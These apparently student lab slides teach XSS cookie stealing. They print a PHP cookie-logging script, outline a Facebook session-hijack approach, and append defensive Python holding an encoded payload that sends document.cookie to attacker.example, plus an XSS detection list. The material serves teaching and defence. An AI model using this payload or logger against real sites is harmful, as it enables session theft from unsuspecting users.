Lab 3: Cookie Stealing using XSS
Kara James, Chelsea Collins, Trevor Norwood, David Johnson

Lab 3 Goals
• Learn what cookies are
• Learn about Cross-Site Scripting attacks
• Learn what it means to steal cookie information
• Get hands-on experience with a web browser vulnerability

What are cookies?
• Nope, not the kind you eat! ;)
• The kind that track you like a creepy stalker!
• Cookies are data stored in a web browser
• There are many different “types” of cookies:
  • Session, Persistent/Tracking
  • Persistent cookies are cookies that outlast user sessions and are used for a variety of reasons
  • Zombie cookies that recreate themselves
• Cookies identify who you are to a website
• The website stores this information (like your username and password) to help provide you with the pages you view
• They can be used to keep track of and keep records of users’ browsing histories and activity

Are they Good or Bad?
• Cookies can be tracked by third parties and are used by advertising companies to track users across multiple sites and pages.
• For example, in 2002 the CIA was leaving persistent cookies on the computers of people visiting its sites.
• In 2005, the NSA also left persistent cookies as a result of a software upgrade.
• RFC 2965 specifies that browsers should protect user privacy and not allow third-party cookies by DEFAULT.
• BUT most browsers ALLOW these third-party cookies by default. It is allowed because browsers and the third-party websites state it in their policies and agreements.
• For instance, do you think Facebook should have the right to track your Google searches? Or any online activity?
Cross-site Scripting Attacks (XSS)
• These vulnerabilities occur in the server-side code
• They are vulnerabilities in web applications
• XSS injects client-side script into web pages
• There are different kinds of XSS attacks, but Lab 3 deals with cookie stealing through XSS
• The injected code steals a cookie that should only be exchanged between the server and the client and sends it to another party

We will be using these Webhacking.zip files
• malURL.htm
• redirectpage.htm
• setgetcookie.htm
• stealcookie.php
• log.txt

Lab 3 Process
1. User first opens setgetcookie.htm on the vulnerable site
2. Sets a cookie
3. Attacker sends malURL.htm to the user with malicious URLs in it
4. Clicking on them redirects the user to redirectpage.htm
5. redirectpage.htm has a script embedded in an HTML tag
6. The script sends the document’s cookie to stealcookie.php on the attacker’s site
7. stealcookie.php logs the cookie on the attacker’s site

setgetcookie.htm

malURL.htm
Hovering over each link with your cursor shows two different destinations. One is more deceiving and more likely to be opened/clicked on.

Second link: redirectpage.htm redirects to stealcookie.php
  <body>
  <?php
  $f = fopen("log.txt", "a");                 // open the attacker's log file for appending
  $cookie = "\n" . $_GET['username'] . "\n";  // the stolen cookie arrives in the username parameter
  fwrite($f, $cookie);                        // append it to log.txt
  fclose($f);
  ?>
  </body>

log.txt
• stealcookie.php stores the cookie in the log.txt file

BAM!!! You’re HACKED!

Today: Changes and Threats
• Lab 3 is only an example of the general process of XSS cookie stealing and would not work in the real world because web browsing security has increased.
• Modern browsers are more sophisticated now: they don’t relocate to new sites without permission and they filter out scripts from links
• But hackers come up with new ways around these features EVERYDAY
• Which is why it is so important to update all of your software regularly.
• Examples of cookie stealing:
  • Malicious links through instant messengers, emails, spam, Facebook, disguised websites, disguised links
  • Web browsing and clicking on malicious links
  • Injected sophisticated scripting code to trick users

Real World Cookie Stealing Example
• Facebook cookie stealing example:
  • You can capture packets using a free network packet analyzer
  • This is where you can find a “cookie” over an internet connection
  • You’ll need other applications as well, like Firefox, Greasemonkey, and the cookieinjector script
  • This example gives you access to their account but doesn’t give you their credentials
  • Only works if the Facebook connection is HTTP
  • Prevented by using HTTPS, which you can enable in your browser under Account Settings > Security

Preventing cookie stealing
• Using HTTPS encrypts and protects
• Web vulnerability scanners
• Choosing to “Remember Me” uses
  • Google uses similar cookies for its services
• Detecting suspicious activity on the server side
• Requiring re-authentication
• Cookies are browser specific
  • Browser fingerprint
• Change browser settings to tell websites not to track you

Any Questions?
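As an added example (not part of the lab materials), this Python snippet shows the defender's side of the Lab 3 process and the "Preventing cookie stealing" slide: a scan of constructed web-server access-log lines for the percent-encoded script that step 6 uses to post document.cookie to stealcookie.php, and a Set-Cookie header carrying the HttpOnly and Secure flags, which keep the cookie out of document.cookie and off plain HTTP. The log lines, the client IPs and the attacker.example host are all constructed.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (not from the lab). The third carries the kind of
# percent-encoded script that redirectpage.htm uses to send document.cookie to
# stealcookie.php; attacker.example and the IPs are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Mar/2024:10:00:01] "GET /setgetcookie.htm HTTP/1.1" 200',
    '10.0.0.5 - - [01/Mar/2024:10:00:09] "GET /search?q=cookie+recipe HTTP/1.1" 200',
    '10.0.0.9 - - [01/Mar/2024:10:01:15] "GET /redirectpage.htm?name=%3Cscript%3E'
    'location%3D%27http%3A%2F%2Fattacker.example%2Fstealcookie.php%3Fusername%3D%27'
    '%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200',
]

# Client IP and request target from a common-log-format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

# Markers of script being carried into the page; matched on the decoded query.
XSS_MARKERS = ("<script", "document.cookie", "javascript:", "onerror=", "onload=")


def flag_xss_requests(log_lines):
    """Return (client_ip, path, marker) for each request whose decoded query
    string carries an XSS marker. Decoding first matters: the payload arrives
    percent-encoded, so a match on the raw line would miss it."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        parts = urlsplit(target)
        decoded = unquote_plus(parts.query).lower()
        for marker in XSS_MARKERS:
            if marker in decoded:
                hits.append((ip, parts.path, marker))
                break
    return hits


def harden_set_cookie(name, value, max_age=3600):
    """Set-Cookie header with the flags the lab's flow lacks: HttpOnly keeps the
    cookie out of document.cookie, so the injected script in step 6 reads
    nothing; Secure restricts it to HTTPS, the slide's own mitigation."""
    return f"{name}={value}; Max-Age={max_age}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    for ip, path, marker in flag_xss_requests(SAMPLE_LOG):
        print(f"suspicious request from {ip} to {path}: found {marker!r}")
    print(harden_set_cookie("session", "abc123"))
```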